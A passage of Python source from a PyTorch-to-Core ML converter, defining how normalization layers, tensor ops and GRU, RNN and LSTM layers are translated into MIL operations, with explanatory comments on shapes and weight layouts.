cudnn_enabled\n elif len(inputs) == 7:\n # inputs skipped:\n # float momentum (5)\n eps = inputs[6]\n\n training = False\n else:\n raise ValueError(\n f\"BatchNorm: got {len(inputs)} inputs, expected 7 or 9\"\n )\n input_rank = _input.rank\n if input_rank < 2 or input_rank > 5:\n raise ValueError(\n \"BatchNorm: Encountered invalid input rank during translation in torch frontend.\"\n )\n\n # If training = True, the mean and variance of the current batch of data are used to normalize the input data.\n # If training = False, data statistics running_mean and running_var are used instead.\n # Note that, even in the evaluation mode (after calling model.eval()), the training parameter can still be true\n # and it just refers to a different computation as mentioned above.\n
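\n # Illustrative sketch (added comment, not from the original converter): the dynamic\n # helper below implements the textbook normalization\n # x_hat = (x - mean) / sqrt(var + eps); out = x_hat * gamma + beta\n # with mean/var reduced over every axis except the channel axis, e.g. for an\n # (N, C, H, W) input the reduction axes are [0, 2, 3].\n\n # helper functions for different type of batch norm\n def _add_batch_norm_dynamic():\n x = _input\n\n if training or (running_mean is None) or (running_var is None):\n axes = [axis for axis in range(x.rank) if axis != 1]\n mean = mb.reduce_mean(x=x, axes=axes, keep_dims=True)\n num = mb.sub(x=x, y=mean)\n square = mb.mul(x=num, y=num)\n variance = mb.reduce_mean(x=square, axes=axes,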
keep_dims=True)\n shape = mb.shape(x=variance)\n else:\n shape = [1] * x.rank\n shape[1] = -1 if any_symbolic(running_mean.shape) else running_mean.shape[0]\n mean = mb.reshape(x=running_mean, shape=shape)\n num = mb.sub(x=x, y=mean)\n variance = mb.reshape(x=running_var, shape=shape)\n\n variance_add_epsilon = mb.add(x=variance, y=eps)\n sqrt = mb.sqrt(x=variance_add_epsilon)\n\n name = node.name if weight is None and bias is None else node.name + \"_div\"\n x = mb.real_div(x=num, y=sqrt, name=name)\n\n if weight is not None:\n weight_reshape = mb.reshape(x=weight, shape=shape)\n name = node.name if bias is None else node.name + \"_mul\"\n x = mb.mul(x=x, y=weight_reshape, name=name)\n\n if bias is not None:\n bias_reshape = mb.reshape(x=bias, shape=shape)\n x = mb.add(x=x, y=bias_reshape, name=node.name)\n\n return x\n\n def _add_batch_norm_1d():\n # first expand the rank-2 (N, C) tensor to rank 3 (N, C, 1), and call the standard mb.batch_norm\n x = mb.expand_dims(x=_input, axes=[-1], name=node.name + \"_rank2_expansion\")\n bn = mb.batch_norm(\n x=x,\n mean=running_mean,\n variance=running_var,\n gamma=weight,\n beta=bias,\n epsilon=eps,\n name=node.name + \"_batch_norm_1d\",\n )\n bn = mb.squeeze(x=bn, name=node.name, axes=[-1])\n return bn\n\n def _add_batch_norm():\n bn = mb.batch_norm(\n x=_input,\n mean=running_mean,\n variance=running_var,\n gamma=weight,\n beta=bias,\n epsilon=eps,\n name=node.name,\n )\n return bn\n\n is_batch_norm_1d_rank_2 = input_rank == 2\n\n if training or running_mean.val is None or running_var.val is None or weight is None or bias is None:\n bn = _add_batch_norm_dynamic()\n elif is_batch_norm_1d_rank_2:\n bn = _add_batch_norm_1d()\n else:\n bn = _add_batch_norm()\n\n if node.kind == \"_native_batch_norm_legit_no_training\":\n # TODO(rdar://117038279) ([Executorch] Handle/Bind other outputs of `_native_batch_norm_legit_no_training` op during lowering)\n bn = (bn, None, None)\n\n context.add(bn, torch_name=node.name)\n\n\n@register_torch_op\ndef instance_norm(context, node):\n inputs = _get_inputs(context, node, expected=9)\n x = inputs[0]\n weight = inputs[1]\n bias = inputs[2]\n eps = inputs[7]\n x = mb.instance_norm(\n x=x,\n gamma=weight,\n beta=bias,\n epsilon=eps,\n name=node.name,\n )\n context.add(x)\n\n\n@register_torch_op\ndef group_norm(context, node):\n inputs = _get_inputs(context, node, expected=6)\n x = inputs[0]\n num_groups = inputs[1].val\n weight = inputs[2]\n bias = inputs[3]\n eps = inputs[4]\n n,c = x.shape[0],x.shape[1] # at minimum (N, C) required\n num_groups = builtins.min(num_groups,c)\n new_shape = [n, num_groups, c//num_groups]\n # optimization for non symbolic shapes.
This gets rid of 3 MIL ops that are otherwise required for dynamic shapes\n if not any_symbolic(x.shape[2:]):\n new_shape += [*x.shape[2:]] # adds remaining dims\n input_shape = [*x.shape] # n, c, *\n else:\n input_shape = mb.shape(x=x)\n input_shape_sliced = mb.slice_by_size(x=input_shape, begin=[2], size=[-1]) # x_shape[2:]\n new_shape = mb.concat(values=[new_shape, input_shape_sliced], axis=0)\n\n num_extra_axes = len(x.shape[2:])\n axes_ = [int(i) for i in range(2, 2 + num_extra_axes + 1)]\n weight_shape, bias_shape = [1,c], [1,c]\n weight_shape += [1 for _ in range(num_extra_axes)]\n bias_shape += [1 for _ in range(num_extra_axes)]\n\n x = mb.reshape(x=x, shape=new_shape)\n mean = mb.reduce_mean(x=x, axes=axes_, keep_dims=True)\n var = _std(x,axes_,True,False,eps.val)\n x = mb.sub(x=x,y=mean)\n x = mb.real_div(x=x,y=var)\n x = mb.reshape(x=x, shape=input_shape)\n if weight is not None:\n weight = mb.reshape(x=weight, shape=weight_shape)\n x = mb.mul(x=x,y=weight)\n if bias is not None:\n bias = mb.reshape(x=bias, shape=bias_shape)\n x = mb.add(x=x, y=bias)\n context.add(x,node.name)\n
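\n# Worked illustration (added comment, not in the original source): for x of shape\n# (2, 6, 4, 4) and num_groups=3, group_norm above reshapes x to (2, 3, 2, 4, 4) and\n# normalizes over axes [2, 3, 4], i.e. one mean/std per (batch, group) pair; gamma and\n# beta are then applied back in the original layout with weight_shape == [1, 6, 1, 1].\n\n\n@register_torch_op\ndef embedding(context, node):\n inputs = _get_inputs(context, node)\n _input = inputs[0]\n indices = inputs[1]\n\n padding_idx = -1\n scale_grad_by_freq = False\n sparse = False\n if len(inputs) >= 3:\n padding_idx = inputs[2].val\n if len(inputs) >= 4:\n scale_grad_by_freq = inputs[3].val\n if len(inputs) >= 5:\n sparse = inputs[4].val\n\n if padding_idx != -1 or scale_grad_by_freq or sparse:\n logger.warning(\n \"Core ML embedding (gather) layer does not support any \"\n \"inputs besides the weights and indices. Those given \"\n \"will be ignored.\"\n )\n\n indices = mb.cast(x=indices, dtype=\"int32\")\n\n # Changing the axis from 0 is not an option in torch, so we don't expose it\n gather = mb.gather(x=_input, indices=indices, name=node.name)\n context.add(gather)\n\n\n@register_torch_op\ndef hardtanh(context, node):\n inputs = _get_inputs(context, node, expected=3)\n _input = inputs[0]\n min_val = inputs[1].val\n max_val = inputs[2].val\n\n res = mb.clip(x=_input, alpha=min_val, beta=max_val, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"concat\"])\ndef cat(context, node):\n inputs = _get_inputs(context, node)\n axis = 0 if len(inputs) == 1 else inputs[1]\n concat = mb.concat(\n values=promote_input_dtypes(inputs[0]), axis=axis, name=node.name\n )\n context.add(concat)\n\n\n@register_torch_op\ndef stack(context, node):\n inputs = _get_inputs(context, node)\n\n values = inputs[0]\n\n if len(inputs) < 2:\n axis = 0\n else:\n axis = inputs[1]\n\n if len(values) == 1:\n res = mb.expand_dims(x=values[0], axes=[axis.val], name=node.name)\n else:\n res = mb.stack(values=values, axis=axis, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef tile(context, node):\n x, dims = _get_inputs(context, node, expected=2)\n\n # The torch.tile only supports tuple of ints for \"dims\", not Tensor.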
So it will not be dynamic.\n if dims is None or dims.val is None:\n raise ValueError(\"The `dims` input for torch.tile must be static (tuple of ints).\")\n\n dims_num = dims.shape[0]\n if dims_num < x.rank:\n # When the number of elements in dims is smaller than rank of x, ones are prepended.\n prepend_ones = np.array([1] * (x.rank - dims_num))\n dims = mb.concat(values=(prepend_ones, dims), axis=0)\n\n res = mb.tile(x=x, reps=dims, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef item(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n if inputs[0].shape == ():\n # MIL ops that reduce already output a scalar, so no need to do\n # anything.\n res = inputs[0]\n elif _np.all([d == 1 for d in inputs[0].shape]):\n # Item only makes sense when called on a length 1 tensor. We use\n # reduce_max as a workaround for not having a way to extract a scalar\n # from a symbolic tensor.\n res = mb.reduce_max(x=inputs[0], name=node.name)\n else:\n raise ValueError(\"expected input to be a scalar or a length 1 tensor\")\n context.add(res, node.name)\n\n\ndef _cast(context, node, dtype, dtype_name):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n # Input must either be a scalar or a (1 x 1 x ... x 1) tensor\n if not (len(x.shape) == 0 or _np.all([d == 1 for d in x.shape])):\n raise ValueError(\"input to cast must be either a scalar or a length 1 tensor\")\n\n if x.can_be_folded_to_const():\n # If x is a compile-time constant, directly cast it to @dtype if it's\n # not one already.\n if not isinstance(x.val, dtype):\n res = mb.const(val=dtype(x.val), name=node.name)\n else:\n res = x\n elif len(x.shape) > 0:\n x = mb.squeeze(x=x, name=node.name + \"_item\")\n res = mb.cast(x=x, dtype=dtype_name, name=node.name)\n else:\n res = mb.cast(x=x, dtype=dtype_name, name=node.name)\n context.add(res, node.name)\n\n\n@register_torch_op(torch_alias=[\"bool\"])\ndef _bool(context, node):\n _cast(context, node, bool, \"bool\")\n\n\n@register_torch_op(torch_alias=[\"int\"])\ndef _int(context, node):\n _cast(context, node, int, \"int32\")\n\n\n@register_torch_op(torch_alias=[\"native_layer_norm\"])\ndef layer_norm(context, node):\n inputs = _get_inputs(context, node, min_expected=5)\n _input = inputs[0]\n normalized_shape = inputs[1]\n weight = inputs[2]\n bias = inputs[3]\n eps = inputs[4]\n # cudnn_enable = inputs[5] unused\n\n layer_norm = mb.layer_norm(\n x=_input,\n axes=list(range(-len(normalized_shape.val), 0)),\n gamma=weight,\n beta=bias,\n epsilon=eps,\n name=node.name,\n )\n\n if node.kind == \"native_layer_norm\":\n # TODO(rdar://117038370) ([Executorch] Handle/Bind other outputs of `native_layer_norm` op during lowering)\n context.add((layer_norm, None, None), torch_name=node.name)\n else:\n context.add(layer_norm)\n\n\n@register_torch_op\ndef numtotensor(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n if x.shape != ():\n raise ValueError(\n \"numtotensor expected scalar input, got tensor with shape {}\".format(\n x.shape\n )\n )\n\n if x.can_be_folded_to_const():\n res = mb.const(val=[x.val], name=node.name)\n context.add(res)\n else:\n context.add(x, node.name)\n\n\ndef _ifzo_to_ifoz(weights, name):\n \"\"\"\n i, f, z, o -> i, f, o, z\n where weights_split[0] == i, etc.\n Used to transform lstm weights from pytorch\n to Core ML format\n \"\"\"\n split_size = weights.shape[0] // 4\n weights_split = mb.split(x=weights, split_sizes=_np.array([split_size] * 4), axis=0)\n return mb.concat(\n values=[weights_split[0], 
weights_split[1], weights_split[3], weights_split[2]],\n axis=0,\n )\n\n\ndef _pytorch_hidden_to_coreml_milops(x, name):\n \"\"\"\n Used to transform lstm state values (hn, cn)\n from pytorch to Core ML format.\n \"\"\"\n split_size = x.shape[0] // 2\n x_split = mb.split(x=x, split_sizes=_np.array([split_size] * 2), axis=0)\n x_concat = mb.concat(\n values=[x_split[0], x_split[1]],\n axis=2,\n )\n # (4.) See docstring to @lstm\n return mb.squeeze(x=x_concat, axes=_np.array([0]), name=name)\n\n\ndef _add_gru_layer(_input, h0, wi, wh, bi, bh, h_list_name, h_name):\n \"\"\"\n Add a single GRU layer.\n Please note that the Core ML GRU has a different definition from Torch,\n so we cannot use mb.gru, and need to implement it with a while loop.\n To be more specific, in Core ML:\n\n o_t = activation(W_{io} x_t + r_t * W_{ho} h_(t−1) + b_{o})\n\n while torch has\n o_t = activation(W_{io} x_t + b_{io} + r_t * (W_{ho} h_(t−1) + b_{ho}))\n\n Inputs:\n _input : (seq_len, batch_size, input_dim)\n h0 : (1, batch_size, hidden_dim)\n wi : (3*hidden_dim, input_dim) for the first layer, else (3*hidden_dim, hidden_dim)\n wh : (3*hidden_dim, hidden_dim)\n bi : (3*hidden_dim)\n bh : (3*hidden_dim)\n\n Return:\n h_list : the list containing all hidden states for each time step,\n with shape (seq_len, batch_size, hidden_dim)\n h : the last hidden state, with shape (1, batch_size, hidden_dim)\n \"\"\"\n
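\n # Worked illustration (added comment, not in the original): for seq_len=4,\n # batch_size=2, hidden_dim=3, h_list is first allocated as (4, 2, 3), h0 is\n # prepended to give (5, 2, 3), the loop scatters h_t into slot t+1, and the\n # leading h0 slice is removed again at the end, so the returned h_list is\n # (4, 2, 3) and h is (1, 2, 3) (the final time step).\n\n # split the weights and bias\n w_ir, w_iz, w_in = _np.split(wi, 3)\n w_hr, w_hz, w_hn = _np.split(wh, 3)\n b_ir, b_iz, b_in = _np.split(bi, 3)\n b_hr, b_hz, b_hn = _np.split(bh, 3)\n\n # allocate hlist\n # hlist : (seq_len, batch_size, hidden_dim)\n x_shape = mb.shape(x=_input)\n seq_len = mb.slice_by_index(x=x_shape, begin=[0], end=[1])\n h_shape = mb.shape(x=h0)\n h_shape = mb.slice_by_index(x=h_shape, begin=[1], end=[3])\n h_list_shape = mb.concat(values=[seq_len, h_shape], axis=0)\n h_list = mb.fill(shape=h_list_shape)\n\n # concatenate h0 to h_list\n # h_list: (seq_len + 1, batch_size, hidden_dim)\n h_list = mb.concat(values=[h0, h_list], axis=0)\n\n def cond(i, h_list):\n return mb.less(x=i, y=seq_len)\n\n def body(i, h_list):\n # slice for the x and state for time step i\n # the resulting shape:\n # xt : (batch_size, input_dim)\n # h_prev : (batch_size, hidden_dim)\n\n xt = mb.gather(x=_input, indices=i, axis=0)\n h_prev = mb.gather(x=h_list, indices=i, axis=0)\n\n xt = mb.squeeze(x=xt, axes=[0])\n h_prev = mb.squeeze(x=h_prev, axes=[0])\n\n # rt = sigmoid(wir * xt + whr * h_prev + bir + bhr)\n # rt : (batch_size, hidden_dim)\n rt_1 = mb.linear(x=xt, weight=w_ir, bias=b_ir)\n rt_2 = mb.linear(x=h_prev, weight=w_hr, bias=b_hr)\n rt = mb.add(x=rt_1, y=rt_2)\n rt = mb.sigmoid(x=rt)\n\n # zt = sigmoid(wiz * xt + whz * h_prev + biz + bhz)\n # zt : (batch_size, hidden_dim)\n zt_1 = mb.linear(x=xt, weight=w_iz, bias=b_iz)\n zt_2 = mb.linear(x=h_prev, weight=w_hz, bias=b_hz)\n zt = mb.add(x=zt_1, y=zt_2)\n zt = mb.sigmoid(x=zt)\n\n # nt = tanh(win * xt + bin + rt(whn * h_prev + bhn))\n # nt : (batch_size, hidden_dim)\n nt_1 = mb.linear(x=xt, weight=w_in, bias=b_in)\n nt_2 = mb.linear(x=h_prev, weight=w_hn, bias=b_hn)\n nt_2 = mb.mul(x=rt, y=nt_2)\n nt = mb.add(x=nt_1, y=nt_2)\n nt = mb.tanh(x=nt)\n\n # h = (1-zt) * nt + zt* h_prev\n # h : (batch_size, hidden_dim)\n h_1 = mb.sub(x=1., y=zt)\n h_1 = mb.mul(x=h_1, y=nt)\n h_2 = mb.mul(x=zt, y=h_prev)\n h = mb.add(x=h_1, y=h_2)\n\n # update counter\n counter = mb.add(x=i, y=1)\n\n # update h and h_list\n h = mb.expand_dims(x=h, axes=[0])\n h_list = mb.scatter(data=h_list,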
indices=counter, updates=h)\n\n return (\n counter,\n h_list,\n )\n\n _, h_list = mb.while_loop(\n _cond=cond, _body=body, loop_vars=([0], h_list),\n )\n\n # slice h0 out of h_list\n h_list = mb.slice_by_index(\n x=h_list,\n begin=[1, 0, 0],\n end=[0, 0, 0],\n begin_mask=[False, True, True],\n end_mask=[True, True, True],\n name=h_list_name,\n )\n\n # get the last state of h_list\n if seq_len.val is None or seq_len.val > 1:\n h = mb.slice_by_index(\n x=h_list,\n begin=[-1, 0, 0],\n end=[-2, 0, 0],\n begin_mask=[False, True, True],\n end_mask=[False, True, True],\n stride=[-1, 1, 1],\n name=h_name,\n )\n else:\n h = h_list\n\n return h_list, h\n\n\n@register_torch_op\ndef gru(context, node):\n inputs = _get_inputs(context, node, expected=9)\n\n _input = inputs[0]\n h0 = inputs[1]\n weights_list = inputs[2]\n has_bias = inputs[3].val\n num_layers = inputs[4].val\n dropout = inputs[5]\n bidirectional = inputs[7].val\n batch_first = inputs[8].val\n\n # For each layer of GRU, the layout of the weights list is [Wi, Wh, bi, bh] with has_bias == True,\n # and is [Wi, Wh] with has_bias == False.\n # If bidirectional == True, the list is doubled up, corresponding to the forward and backward directions.\n expected_num_weights = 2 * num_layers * (int(has_bias) + 1) * (int(bidirectional) + 1)\n if len(weights_list) != expected_num_weights:\n raise ValueError(\n \"Incorrect weights shape for gru layer: Expected: {}. Received {}\".format(\n expected_num_weights, len(weights_list)\n )\n )\n
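\n # Worked example (added, illustrative only): num_layers=2, has_bias=True,\n # bidirectional=True gives expected_num_weights = 2 * 2 * 2 * 2 = 16, i.e.\n # [Wi, Wh, bi, bh] per direction per layer.\n\n # Transpose the input data to (seq_len, batch_size, input_dim) if batch_first == True\n if batch_first:\n _input = mb.transpose(x=_input, perm=[1, 0, 2])\n\n # iterate through all the layers\n x = _input\n state_out_list = []\n\n def _get_weights_and_bias(weights_list, index, num_layers, has_bias, bidirectional, mode):\n num_weights_per_layer = len(weights_list) // num_layers\n weights = weights_list[\n num_weights_per_layer * index : num_weights_per_layer * (index + 1)\n ]\n\n if bidirectional:\n weights_f, weights_r = (\n weights[: num_weights_per_layer // 2],\n weights[num_weights_per_layer // 2 :],\n )\n assert len(weights_f) == len(weights_r)\n else:\n weights_f, weights_r = weights, []\n\n if mode == \"forward\":\n weights = weights_f\n elif mode == \"reverse\":\n weights = weights_r\n\n wi, wh = weights[0].val, weights[1].val\n\n if has_bias:\n bi, bh = weights[2].val, weights[3].val\n else:\n hidden_dim = wh.shape[1]\n bi, bh = _np.zeros(3 * hidden_dim), _np.zeros(3 * hidden_dim)\n\n return wi, wh, bi, bh\n\n def _get_initial_state(h0, i, bidirectional, mode):\n\n if mode == \"forward\":\n return mb.slice_by_index(\n x=h0,\n begin=[(1 + int(bidirectional)) * i, 0, 0],\n end=[(1 + int(bidirectional)) * i + 1, 0, 0],\n begin_mask=[False, True, True],\n end_mask=[False, True, True],\n )\n if mode == \"reverse\":\n assert bidirectional\n return mb.slice_by_index(\n x=h0,\n begin=[2 * i + 1, 0, 0],\n end=[2 * (i + 1), 0, 0],\n begin_mask=[False, True, True],\n end_mask=[False, True, True],\n )\n\n seq_output_name = node.outputs[0] # output sequence name\n state_output_name = node.outputs[1] # output state name\n\n for i in range(num_layers):\n # get layer names\n x_name = seq_output_name + \"_layer_\" + str(i) if i < num_layers - 1 else seq_output_name\n h_name = state_output_name + '_layer_' + str(i) if num_layers > 1 else state_output_name\n\n if batch_first:\n x_name += \"_tmp\"\n\n if bidirectional:\n x_f_name = x_name + '_forward'\n h_f_name = h_name + '_forward'\n x_r_name = x_name + '_backward'\n h_r_name = h_name +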
'_backward'\n else:\n x_f_name = x_name\n h_f_name = h_name\n\n # forward direction\n x_f = x\n wi_f, wh_f, bi_f, bh_f = _get_weights_and_bias(\n weights_list, i, num_layers, has_bias, bidirectional, \"forward\"\n )\n initial_h_f = _get_initial_state(h0, i, bidirectional, \"forward\")\n x_f, h_f = _add_gru_layer(x_f, initial_h_f, wi_f, wh_f, bi_f, bh_f, x_f_name, h_f_name)\n\n # reverse direction\n if bidirectional:\n x_r = mb.reverse(x=x, axes=[0])\n wi_r, wh_r, bi_r, bh_r = _get_weights_and_bias(\n weights_list, i, num_layers, has_bias, bidirectional, \"reverse\"\n )\n initial_h_r = _get_initial_state(h0, i, bidirectional, \"reverse\")\n x_r, h_r = _add_gru_layer(\n x_r,\n initial_h_r,\n wi_r,\n wh_r,\n bi_r,\n bh_r,\n x_r_name + \"_reverse\",\n h_r_name,\n )\n x_r = mb.reverse(x=x_r, axes=[0], name=x_r_name)\n\n # concatenate the outputs from the forward and reverse directions\n x = mb.concat(values=[x_f, x_r], axis=2, name=x_name)\n h = mb.concat(values=[h_f, h_r], axis=0, name=h_name)\n else:\n x = x_f\n h = h_f\n\n state_out_list.append(h)\n\n # rnn output\n if batch_first:\n x = mb.transpose(x=x, perm=[1, 0, 2], name=seq_output_name)\n context.add(x, seq_output_name)\n\n # state output\n if len(state_out_list) > 1:\n h = mb.concat(values=state_out_list, axis=0, name=state_output_name)\n context.add(h, state_output_name)\n\n\ndef _add_simple_rnn(context, node, activation):\n inputs = _get_inputs(context, node, expected=9)\n\n '''\n Batch size: B\n Sequence length: S\n Input dimension: C\n Hidden dimension: H\n\n (1) _input : (B, S, C) if batch_first == True, else (S, B, C)\n (2) h0: (num_layers, B, H)\n '''\n _input = inputs[0]\n h0 = inputs[1]\n weights_list = inputs[2]\n has_bias = inputs[3].val\n num_layers = inputs[4].val\n dropout = inputs[5]\n bidirectional = inputs[7].val\n batch_first = inputs[8].val\n\n # We only support uni-directional simple RNN for now\n if bidirectional:\n raise NotImplementedError(\"Bidirectional simple RNN not supported.\")\n
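\n # Sketch (added for clarity, not in the original): each mb.rnn call below computes\n # h_t = activation(W_ih x_t + W_hh h_{t-1} + b)\n # torch keeps two bias vectors (b_ih, b_hh); MIL's rnn op takes a single bias,\n # so the two are summed into one further down.\n\n expected_num_weights = 2 * num_layers * (int(has_bias) + 1)\n if len(weights_list) != expected_num_weights:\n raise ValueError(\n \"Incorrect weights shape for rnn layer: Expected: {}.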
Received {}\".format(\n expected_num_weights, len(weights_list)\n )\n )\n\n # Transpose the input data to (S, B, C) if batch_first == True\n if batch_first:\n _input = mb.transpose(x=_input, perm=[1, 0, 2])\n\n state_out_list = []\n out = _input\n\n for i in range(num_layers):\n if has_bias:\n weight_ih = weights_list[4 * i]\n weight_hh = weights_list[4 * i + 1]\n bias = mb.add(x=weights_list[4 * i + 2], y=weights_list[4 * i + 3])\n else:\n weight_ih = weights_list[2 * i]\n weight_hh = weights_list[2 * i + 1]\n bias = None\n\n # get the initial state\n initial_h = mb.slice_by_index(\n x=h0,\n begin=[i, 0, 0],\n end=[0, 0, 0],\n stride=[1, 1, 1],\n begin_mask=[False, True, True],\n end_mask=[False, True, True],\n squeeze_mask=[True, False, False],\n )\n\n # get the RNN output for each unit\n out, state = mb.rnn(\n x=out,\n initial_h=initial_h,\n weight_ih=weight_ih,\n weight_hh=weight_hh,\n bias=bias,\n output_sequence=True,\n activation=activation,\n )\n\n # append state to lists which will stack later\n state_out_list.append(state)\n\n # rnn output\n output_name = node.outputs[0]\n if batch_first:\n out = mb.transpose(x=out, perm=[1, 0, 2], name=output_name)\n else:\n out = mb.identity(x=out, name=output_name)\n context.add(out, output_name)\n\n # stack the states into a single tensor\n state_output_name = node.outputs[1]\n if num_layers == 1:\n state = mb.expand_dims(x=state_out_list[0], axes=[0], name=state_output_name)\n else:\n state = mb.stack(values=state_out_list, axis=0, name=state_output_name)\n context.add(state, state_output_name)\n\n\n@register_torch_op\ndef rnn_tanh(context, node):\n _add_simple_rnn(context, node, \"tanh\")\n\n\n@register_torch_op\ndef rnn_relu(context, node):\n _add_simple_rnn(context, node, \"relu\")\n\n\ndef _add_mil_lstm(input, initial_h, initial_c, weights, has_bias, bidirectional, name):\n \"\"\"\n Most of this code is to transform the tensors into\n a shape acceptable by the Core ML implementation of LSTM.\n\n For weights, biases, per direction, pytorch uses two tensors:\n (ii, if, ig, io) stacked on top of each other for each layer (tensor 1)\n and (hi, hf, hg, ho) stacked on top of each other for each layer (tensor 2).\n That is, (W_ii|W_if|W_ig|W_io), of shape (4*hidden_size, input_size) and\n (W_hi|W_hf|W_hg|W_ho), of shape (4*hidden_size, hidden_size).\n\n\n The Core ML LSTM op expects two tensors, weight and bias. So\n the tensors for weight and bias are separated from pytorch's @weights list (1.).\n For bias tensor, the Core ML LSTM op expects the form ii, if, io, ig and hi, hf, ho, hg,\n requiring the ifzo_to_ifoz function. Further adding input and hidden bias into one (2.).\n Similar to bias, input and hidden weight requires different layout. 
(3.)\n\n initial_h and initial_c are lists of \"num_layers\" tensors, each of shape [n_directions, B, H],\n where n_directions = 1 or 2,\n whereas the shapes of the initial states to MIL's LSTM, BiLSTM must be [B, H] and [B, 2*H] respectively.\n This means we need to do the following transformations:\n - if it's an LSTM (n_directions=1):\n squeeze the first dimension of initial_h/initial_c before feeding it to MIL's LSTM\n - if it's a BiLSTM (n_directions=2):\n - split the input, shape=(2, B, H), to get (1,B,H) and (1,B,H)\n - concatenate to get (1,B,2*H)\n - squeeze to get (B,2*H)\n \"\"\"\n
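\n # Worked illustration (added comment, not in the original): for hidden_size H, torch\n # stacks the gates as W = [W_i; W_f; W_g; W_o] (each block H rows); _ifzo_to_ifoz\n # reorders this to [W_i; W_f; W_o; W_g] (torch's g is Core ML's cell gate z), and the\n # two torch biases are reordered and summed into the single bias MIL expects.\n\n if bidirectional:\n if has_bias:\n # (1.)\n biases = weights[2:4] + weights[6:8]\n weights = weights[0:2] + weights[4:6]\n\n # (2.)\n assert len(biases) == 4\n for index in range(len(biases)):\n biases[index] = _ifzo_to_ifoz(\n biases[index],\n name=\"{}_lstm_bias_reshape_{}\".format(name, index),\n )\n f_b = mb.add(x=biases[0], y=biases[1], )\n r_b = mb.add(x=biases[2], y=biases[3], )\n\n # (3.)\n f_ih_w = _ifzo_to_ifoz(\n weights[0], name=name + \"_lstm_forward_ih_weights_ifoz_to_ifzo\",\n )\n f_hh_w = _ifzo_to_ifoz(\n weights[1], name=name + \"_lstm_forward_hh_weights_ifoz_to_ifzo\",\n )\n r_ih_w = _ifzo_to_ifoz(\n weights[2], name=name + \"_lstm_reverse_ih_weights_ifoz_to_ifzo\",\n )\n r_hh_w = _ifzo_to_ifoz(\n weights[3], name=name + \"_lstm_reverse_hh_weights_ifoz_to_ifzo\",\n )\n\n h = _pytorch_hidden_to_coreml_milops(initial_h, name=name + \"_lstm_h0_reshaped\")\n c = _pytorch_hidden_to_coreml_milops(initial_c, name=name + \"_lstm_c0_reshaped\")\n return mb.lstm(x=input,\n initial_h=h,\n initial_c=c,\n weight_ih=f_ih_w,\n weight_hh=f_hh_w,\n weight_ih_back=r_ih_w,\n weight_hh_back=r_hh_w,\n bias=(f_b if has_bias else None),\n bias_back=(r_b if has_bias else None),\n direction=\"bidirectional\",\n output_sequence=True,\n name=name)\n else:\n if has_bias:\n # (1.)\n biases = weights[len(weights) // 2:]\n weights = weights[: len(weights) // 2]\n # (2.)\n b = mb.add(x=biases[0], y=biases[1], )\n b = _ifzo_to_ifoz(\n b, name=name + \"_lstm_bias_transformed\",\n )\n # (3.)\n f_ih_w = _ifzo_to_ifoz(\n weights[0], name=name + \"_lstm_ih_weights_ifoz_to_ifzo\",\n )\n f_hh_w = _ifzo_to_ifoz(\n weights[1], name=name + \"_lstm_hh_weights_ifoz_to_ifzo\",\n )\n\n h = mb.squeeze(x=initial_h, axes=_np.array([0]), name=name + \"_lstm_h0_squeeze\")\n c = mb.squeeze(x=initial_c, axes=_np.array([0]), name=name + \"_lstm_c0_squeeze\")\n\n return mb.lstm(x=input,\n initial_h=h,\n initial_c=c,\n weight_ih=f_ih_w,\n weight_hh=f_hh_w,\n bias=(b if has_bias else None),\n direction=\"forward\",\n output_sequence=True,\n name=name)\n\n\n@register_torch_op\ndef lstm(context, node):\n inputs = _get_inputs(context, node, expected=9)\n\n _input = inputs[0]\n\n # there are two cases here,\n # (1) the input tensor is a PackedSequence object,\n # in this case, the second input of the lstm layer is the batch_size (MIL Var).\n # (2) the input tensor is a normal tensor,\n # in this case, the second input is an array.\n # As a result, we can use the second input to identify which category the graph is in.\n\n has_batch_sizes = not isinstance(inputs[1], Iterable)\n if has_batch_sizes:\n batch_sizes = inputs[1]\n h0, c0 = inputs[2]\n weights_list = inputs[3]\n has_bias = inputs[4].val\n num_layers = inputs[5].val\n dropout = inputs[6]\n bidirectional = inputs[8].val\n # the output of the _pack_padded_sequence is always in the layout of batch first\n batch_first = True\n else:\n h0, c0 = inputs[1]\n weights_list = inputs[2]\n has_bias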
= inputs[3].val\n num_layers = inputs[4].val\n dropout = inputs[5]\n bidirectional = inputs[7].val\n batch_first = inputs[8].val\n\n '''\n Torch LSTM layer's input shapes:\n\n (1) first input\n (Seq, B, C) : if batch_first = False\n (B, Seq, C) : if batch_first = True\n\n (2) & (3) initialization states\n (num_layers, B, H) : if bidirectional = False\n (num_layers * 2, B, H) : if bidirectional = True\n\n\n For the MIL LSTM layer, these are the input shapes:\n\n (1) first input: (Seq, B, C)\n this means, if batch_first=True, we need to insert a transpose op first\n\n (2) & (3) initialization states\n MIL's LSTM layer does not natively support the \"num_layers\" parameter.\n So, when num_layers > 1, we add multiple MIL LSTM ops in a sequence.\n Each of these LSTM ops will take in initialization states in the following shape:\n (B, H) if bidirectional = False\n (B, 2*H) if bidirectional = True\n '''\n\n if batch_first:\n _input = mb.transpose(x=_input, perm=[1, 0, 2], name=_input.name + \"_batch_first_transpose\")\n\n expected_num_weights = 2 * num_layers * (int(bidirectional) + 1) * (int(has_bias) + 1)\n if len(weights_list) != expected_num_weights:\n raise ValueError(\n \"Incorrect weights shape for lstm layer: Expected: {}. Received {}\".format(\n expected_num_weights, len(weights_list)\n )\n )\n\n # shapes of h0 and c0 are (num_layers * n_directions, B, H)\n if num_layers == 1:\n all_initial_h = [h0] # [(n_directions, B, H)]\n all_initial_c = [c0] # [(n_directions, B, H)]\n else:\n all_initial_h = mb.split(\n x=h0, num_splits=num_layers, axis=0\n ) # [(n_directions, B, H)]\n all_initial_c = mb.split(\n x=c0, num_splits=num_layers, axis=0\n ) # [(n_directions, B, H)]\n\n n_weights_per_layer = int(len(weights_list) / num_layers)\n x = _input\n h_out_list = []\n c_out_list = []\n for i in range(num_layers):\n if i < num_layers - 1:\n op_name = node.name + \"_lstm_layer_{}\".format(i)\n else:\n if batch_first:\n op_name = node.name + \"_batch_first\"\n else:\n op_name = node.name\n\n lstm_out = _add_mil_lstm(\n input=x,\n initial_h=all_initial_h[i],\n initial_c=all_initial_c[i],\n weights=weights_list[\n i * n_weights_per_layer : (i + 1) * 